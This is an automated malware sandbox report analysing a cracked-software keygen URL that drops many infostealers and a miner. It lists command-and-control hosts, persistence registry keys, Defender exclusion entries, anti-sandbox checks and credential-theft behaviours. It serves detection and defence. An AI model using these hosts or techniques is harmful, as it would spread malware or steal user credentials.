Resubmissions
22-04-2021 16:45
210422-k9xv9nxcbx 1021-04-2021 17:01
210421-pl1rqeqs7n 1021-04-2021 12:53
210421-gkr26l4mvs 1020-04-2021 19:55
210420-nex8ep6zhj 1020-04-2021 15:03
210420-v63pp18knj 10Analysis
-
max time kernel
822s -
max time network
889s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-04-2021 19:55
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Behavioral task
behavioral1
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
Behavioral task
behavioral2
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210408
Behavioral task
behavioral3
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win7v20210410
Behavioral task
behavioral4
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210408
Behavioral task
behavioral5
Sample
https://keygenit.com/d/8550ceeb125094q2480.html
Resource
win10v20210410
General
-
Target
https://keygenit.com/d/8550ceeb125094q2480.html
-
Sample
210420-nex8ep6zhj
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
562d987fd49ccf22372ac71a85515b4d288facd7
-
url4cnc
https://telete.in/j90dadarobin
Extracted
fickerstealer
sodaandcoke.top:80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 6788 created 4584 6788 svchost.exe app.exe -
fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4500-311-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
Processes:
msiexec.exepowershell.exeflow pid process 201 4500 msiexec.exe 594 6156 powershell.exe 201 4500 msiexec.exe 688 4500 msiexec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Ultra.exeplayer_record_48792.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe File opened for modification C:\Windows\system32\drivers\etc\hosts player_record_48792.exe -
Executes dropped EXE 64 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-5.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeFree.exeJoSetp.exe1D9B.tmp.exeuQLGv.exe8691400.exe8846904.exeaskinstall20.exeWindows Host.exeInstall.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpNekaedyxyta.exeSHaewushotezhi.exeUltraMediaBurner.exefilee.exe9A3D.tmp.exe9C61.tmp.exe9A3D.tmp.exejg6_6asg.exekabo.exekabo.exeIrecCH6.exeIrecCH6.tmpplayer_record_48792.exeirecord.exeirecord.tmpVozhutimaxi.exeDugaeshurihu.exegcttt.exei-record.exejfiag3g_gg.exejfiag3g_gg.exegaoou.exejfiag3g_gg.exegoogle-game.exejfiag3g_gg.exemd1_1eaf.exebuild.exeaskinstall36.exeConhost.exey1.exeTWYJMAIIET.exeABCbrowser.exemain.exetoolspab1.exeinst.exeXvPGmUSunLabsPlayer.exetoolspab1.exeapp.exezlZefTparse.exe496F.exeparse.exeConhost.exepid process 5700 keygen-pr.exe 5716 keygen-step-1.exe 5756 keygen-step-5.exe 5784 keygen-step-2.exe 5804 keygen-step-3.exe 4712 keygen-step-4.exe 4952 key.exe 1964 Free.exe 3036 JoSetp.exe 1760 1D9B.tmp.exe 4892 uQLGv.exe 5500 8691400.exe 5416 8846904.exe 2808 askinstall20.exe 5980 Windows Host.exe 4860 Install.exe 5336 Install.tmp 5872 Ultra.exe 5968 ultramediaburner.exe 5884 ultramediaburner.tmp 5964 Nekaedyxyta.exe 3964 SHaewushotezhi.exe 5892 UltraMediaBurner.exe 3096 filee.exe 3492 9A3D.tmp.exe 1816 9C61.tmp.exe 4312 9A3D.tmp.exe 1420 jg6_6asg.exe 3032 kabo.exe 5176 kabo.exe 4696 IrecCH6.exe 744 IrecCH6.tmp 4296 player_record_48792.exe 2320 irecord.exe 4656 irecord.tmp 2328 Vozhutimaxi.exe 6040 Dugaeshurihu.exe 5644 gcttt.exe 3092 i-record.exe 4296 jfiag3g_gg.exe 6460 jfiag3g_gg.exe 6560 gaoou.exe 6740 jfiag3g_gg.exe 2472 google-game.exe 6652 jfiag3g_gg.exe 5416 md1_1eaf.exe 6920 build.exe 6176 askinstall36.exe 6192 Conhost.exe 6936 y1.exe 6400 TWYJMAIIET.exe 5868 ABCbrowser.exe 4388 main.exe 7120 toolspab1.exe 5484 inst.exe 4616 XvPGmU 6792 SunLabsPlayer.exe 2516 toolspab1.exe 4584 app.exe 1332 zlZefT 2704 parse.exe 4928 496F.exe 1836 parse.exe 6660 Conhost.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
496F.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 496F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 496F.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Nekaedyxyta.exekeygen-step-4.exeVozhutimaxi.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Nekaedyxyta.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Vozhutimaxi.exe -
Loads dropped DLL 64 IoCs
Processes:
rundll32.exeregsvr32.exe1D9B.tmp.exeInstall.tmpkabo.exeIrecCH6.tmpi-record.exerundll32.exebuild.exemain.exeSunLabsPlayer.exetoolspab1.exey1.exerundll32.exerundll32.exelighteningplayer-cache-gen.exepid process 3040 rundll32.exe 5388 regsvr32.exe 1760 1D9B.tmp.exe 5336 Install.tmp 1760 1D9B.tmp.exe 1760 1D9B.tmp.exe 1760 1D9B.tmp.exe 1760 1D9B.tmp.exe 5176 kabo.exe 744 IrecCH6.tmp 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 3092 i-record.exe 6340 rundll32.exe 6920 build.exe 6920 build.exe 4388 main.exe 6792 SunLabsPlayer.exe 2516 toolspab1.exe 6792 SunLabsPlayer.exe 6936 y1.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 2100 rundll32.exe 952 rundll32.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 6792 SunLabsPlayer.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe 5356 lighteningplayer-cache-gen.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
rundll32.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PQUvOF = "0" rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
8846904.exeUltra.exe9C61.tmp.exeplayer_record_48792.exegcttt.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 8846904.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\SHixeqaraemi.exe\"" Ultra.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9C61.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe" 9C61.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xemolysuna.exe\"" player_record_48792.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
496F.exejg6_6asg.exeFCFD.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 496F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FCFD.exe -
Drops Chrome extension 1 IoCs
Processes:
askinstall20.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json askinstall20.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 197 api.ipify.org 312 ip-api.com 750 ip-api.com -
Drops file in System32 directory 14 IoCs
Processes:
svchost.exesvchost.exerundll32.exerundll32.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\T2HW6PL2.cookie svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 5925530CD041CC66 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 1609C27D7F0C6B4B svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\T2HW6PL2.cookie svchost.exe File opened for modification C:\Windows\System32\Tasks\PQUvOF svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
regsvr32.exepid process 5388 regsvr32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
Processes:
main.exeparse.exe496F.exeparse.exepid process 4388 main.exe 4388 main.exe 4388 main.exe 4388 main.exe 4388 main.exe 4388 main.exe 4388 main.exe 1836 parse.exe 4928 496F.exe 2704 parse.exe 4928 496F.exe 1836 parse.exe 2704 parse.exe 4928 496F.exe -
Suspicious use of SetThreadContext 20 IoCs
Processes:
svchost.exe9C61.tmp.exe9A3D.tmp.exekabo.exeinst.exetoolspab1.exeXvPGmUABCbrowser.exeE421.exe647349126.exe1371397063.exe21DE.exe2DE6.exe2990.exeBA5.exe3318.exefcvujhhwdvujhhdescription pid process target process PID 4716 set thread context of 4188 4716 svchost.exe svchost.exe PID 4716 set thread context of 5932 4716 svchost.exe svchost.exe PID 1816 set thread context of 5500 1816 9C61.tmp.exe msiexec.exe PID 1816 set thread context of 4500 1816 9C61.tmp.exe msiexec.exe PID 3492 set thread context of 4312 3492 9A3D.tmp.exe 9A3D.tmp.exe PID 3032 set thread context of 5176 3032 kabo.exe kabo.exe PID 5484 set thread context of 4616 5484 inst.exe XvPGmU PID 7120 set thread context of 2516 7120 toolspab1.exe toolspab1.exe PID 4616 set thread context of 1332 4616 XvPGmU zlZefT PID 5868 set thread context of 7088 5868 ABCbrowser.exe AddInProcess32.exe PID 4336 set thread context of 6256 4336 E421.exe AddInProcess32.exe PID 3908 set thread context of 6432 3908 647349126.exe AddInProcess32.exe PID 2324 set thread context of 6352 2324 1371397063.exe AddInProcess32.exe PID 3120 set thread context of 6232 3120 21DE.exe AddInProcess32.exe PID 5496 set thread context of 6904 5496 2DE6.exe AddInProcess32.exe PID 5996 set thread context of 6208 5996 2990.exe AddInProcess32.exe PID 5168 set thread context of 6992 5168 BA5.exe BA5.exe PID 2624 set thread context of 5416 2624 3318.exe 3318.exe PID 1836 set thread context of 4612 1836 fcvujhh fcvujhh PID 5376 set thread context of 4532 5376 wdvujhh wdvujhh -
Drops file in Program Files directory 64 IoCs
Processes:
SunLabsPlayer.exeultramediaburner.tmpirecord.tmpUltra.exeFree.exeplayer_record_48792.exedata_load.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\temp_files SunLabsPlayer.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\recording\unins000.dat irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\recording\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\recording\is-G1SNU.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-156EA.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\recording\avdevice-53.dll irecord.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll SunLabsPlayer.exe File created C:\Program Files\VideoLAN\VBBCATZOTI\ultramediaburner.exe Ultra.exe File created C:\Program Files (x86)\recording\is-B4VB4.tmp irecord.tmp File created C:\Program Files\management.dll Free.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\WindowsPowerShell\Xemolysuna.exe player_record_48792.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe SunLabsPlayer.exe File created C:\Program Files (x86)\recording\is-1VSA0.tmp irecord.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\recording\avutil-51.dll irecord.tmp File opened for modification C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll SunLabsPlayer.exe File created C:\Program Files\install.dat Free.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt SunLabsPlayer.exe -
Drops file in Windows directory 1 IoCs
Processes:
MicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6920 6124 WerFault.exe svchost.exe 6864 676 WerFault.exe svchost.exe 2892 4252 WerFault.exe svchost.exe 5084 5872 WerFault.exe svchost.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
kabo.exefcvujhhwdvujhhtoolspab1.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fcvujhh Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fcvujhh Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wdvujhh Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wdvujhh Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kabo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fcvujhh Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wdvujhh -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build.exesvchost.exesvchost.exe9A3D.tmp.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9A3D.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9A3D.tmp.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 4300 timeout.exe 6292 timeout.exe 4476 timeout.exe 4880 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
xcopy.exechrome.exexcopy.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4948 taskkill.exe 5892 taskkill.exe 7008 taskkill.exe 1588 taskkill.exe 2216 taskkill.exe 5832 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
app.exesvchost.exesvchost.exerundll32.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 